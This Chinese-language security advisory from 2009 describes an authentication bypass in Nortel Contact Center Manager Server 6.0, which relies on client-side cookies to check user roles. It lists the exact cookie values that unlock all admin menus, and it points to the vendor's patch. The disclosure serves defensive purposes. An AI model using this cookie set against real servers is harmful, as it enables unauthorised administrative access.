发布日期：2009-05-14
更新日期：2009-05-27

受影响系统：

Nortel Networks Contact Center Manager Server 6.0

描述：

---

BUGTRAQ  ID: 34966

Contact Center Manager Server（CCMS）是功能强大的呼叫中心解决方案。

CCMS依赖于客户端Cookie检查已认证用户的角色。如果手动设置了这些Cookie，就可以绕过认证访问CCMS。

可通过设置以下cookie访问所有的菜单项：

LoginMsgSwitch=True
LoginMsgAccepted=True
Logged=True
isAdmin=True
LoginMsgSwitch=True
LoginMsgAccepted=True
IsConfig=1
IsUser=1
IsRTD=1
IsReport=1
IsScript=1
IsAudit=1
IsEmHelp=1
isOutbound=1
UserID=x
AuditSwitch=on
LoginMsgAccepted=True

<*来源：Bernhard Mueller （research@sec-consult.com）
  
  链接：http://marc.info/?l=bugtraq&m=124335502922159&w=2
        http://www116.nortel.com/pub/repository/CLARIFY/DOCUMENT/2009/19/024778-01.pdf
*>

建议：

---

厂商补丁：

Nortel Networks
---------------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://support.nortel.com/

浏览次数：2419
严重程度：0（网友投票）